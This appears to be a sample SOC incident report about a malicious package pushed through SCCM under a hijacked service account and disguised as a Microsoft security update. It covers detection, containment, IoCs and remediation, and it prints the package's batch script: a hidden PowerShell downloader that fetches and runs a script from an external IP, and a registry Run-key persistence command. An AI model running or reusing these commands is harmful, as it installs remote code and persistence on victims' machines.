SCCM Alert Details
Alert ID: SCCM-SOFTWARE-DEPLOY-1072-7842
Alert Time: 2024-02-14 10:45:22 EST
Severity: HIGH (82/100)
Source: Microsoft Endpoint Configuration Manager (SCCM)
Rule: “Unauthorized Software Package Deployment”
MITRE ATT&CK: T1072 – Software Deployment Tools
Alert Details:
Detection: Unauthorized package deployed via SCCM to multiple endpoints
Package Details:
– Package ID: PKG00045
– Package Name: “Critical Security Update – KB5001234”
– Created By: DOMAIN\svc_sccm_admin (Service Account)
– Created Time: 10:30 EST
– Deployment: Available to “All Workstations” collection (2,500+ endpoints)
– Program: “install_update.bat”
Program Content (install_update.bat):
@echo off powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1” reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d “powershell -WindowStyle Hidden -File %temp%\update.ps1” /f
Anomaly Detection:
– Package name mimics legitimate Microsoft security update
– Created by service account (svc_sccm_admin) that normally does not create packages
– Source IP for package creation: 10.0.45.67 (unusual for admin)
– Package deployed to all workstations (unusual scope)
– Contains PowerShell downloader
Deployment Status:
– 47 endpoints received package before alert
– 0 endpoints executed (SCCM enforcement runs at 11:00)
– Alert triggered before execution
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify SCCM logs and package
SCCM Console
Confirmed unauthorized package
2. Immediate Action
Delete package, remove deployments
SCCM
Package deleted; deployments removed
3. Service Account Investigation
Check svc_sccm_admin activity
Azure AD, CrowdStrike
Service account credentials compromised (password in pastebin)
4. Affected Endpoints
Identify endpoints that received package
SCCM Logs
47 endpoints; none executed (alert before enforcement)
5. Credential Rotation
Rotate service account password
Azure AD, AD
Password rotated; account disabled temporarily
6. Threat Hunting
Check for other unauthorized packages
SCCM Logs
No other packages found
Jira Incident Report
Ticket: SOC-2024-074
Summary: T1072 – Unauthorized Malicious Package Deployed via SCCM
Status: RESOLVED
Resolution: MALICIOUS – Package Removed Before Execution
Priority: P1 – HIGH
Labels: T1072, software-deployment, sccm, supply-chain, service-account-compromise
Components: Endpoint-Management, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Endpoint Configuration Manager (SCCM) logs.
Alert: “Unauthorized Software Package Deployment”.
Package: “Critical Security Update – KB5001234” (malicious).
Time: 2024-02-14 10:45 EST.
Technique: MITRE ATT&CK T1072 – Software Deployment Tools.
2. Technical Analysis:
Attack Chain:
1. Attacker obtained svc_sccm_admin credentials (password reused from LinkedIn breach)
2. Logged into SCCM console from IP 10.0.45.67 (internal)
3. Created malicious package mimicking Microsoft security update
4. Deployed to “All Workstations” collection (2,500+ endpoints)
5. Package would execute PowerShell downloader at 11:00
6. Alert triggered before execution
Malicious Package:
Name: “Critical Security Update – KB5001234”
Program: install_update.bat
Payload: PowerShell downloads update.ps1 from 185.143.221[.]89
Persistence: Adds registry run key for future execution
Service Account Compromise:
Account: svc_sccm_admin
Credentials found on pastebin (from LinkedIn breach)
Password not changed in 2 years
No MFA on service account
Affected Endpoints:
47 endpoints received package before deletion
None executed (enforcement time 11:00)
All endpoints scanned (clean)
3. Investigation Findings:
Timeline:
10:00 – Attacker logs into SCCM console
10:05 – Creates malicious package
10:10 – Deploys to All Workstations collection
10:30 – Package creation logged
10:45 – SOC alert triggered
10:47 – Package deleted
10:50 – Service account disabled
Indicators of Compromise (IoCs):
SCCM:
– Package ID: PKG00045
– Package Name: “Critical Security Update – KB5001234”
Network:
– Download URL: http://185.143.221[.]89/update.ps1
Account:
– svc_sccm_admin (compromised)
4. Containment Actions:
Immediate Actions:
Deleted malicious package from SCCM.
Removed all deployments.
Disabled svc_sccm_admin account.
Blocked download URL at firewall.
Endpoint Remediation:
Scanned all 47 affected endpoints (clean).
No further action needed.
Credential Remediation:
Rotated service account password.
Enforced MFA for all service accounts.
Audited all service account permissions.
5. Root Cause Analysis:
Primary Cause: Compromised service account credentials (password reuse).
Contributing Factors:
No MFA on service account.
Password not rotated in 2 years.
SCCM console accessible from internal network without additional controls.
6. Business Impact:
Operational Impact: None (package removed before execution).
Data Exposure: None.
Reputational Impact: Potential if package had executed.
7. Remediation & Prevention:
Completed Actions:
Package removed.
Service account secured.
Affected endpoints verified clean.
Technical Controls Enhanced:
Enforced MFA for all administrative accounts.
Implemented Just-In-Time (JIT) access for SCCM console.
Added approval workflow for all package deployments.
Enhanced monitoring for unusual package creation.
8. Conclusion:
Attackers compromised an SCCM service account and created a malicious package targeting all workstations. Detection occurred before execution, preventing widespread compromise. Enhanced controls now protect against similar attacks.
Closure Rationale: Package removed; account secured; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-14 12:00 EST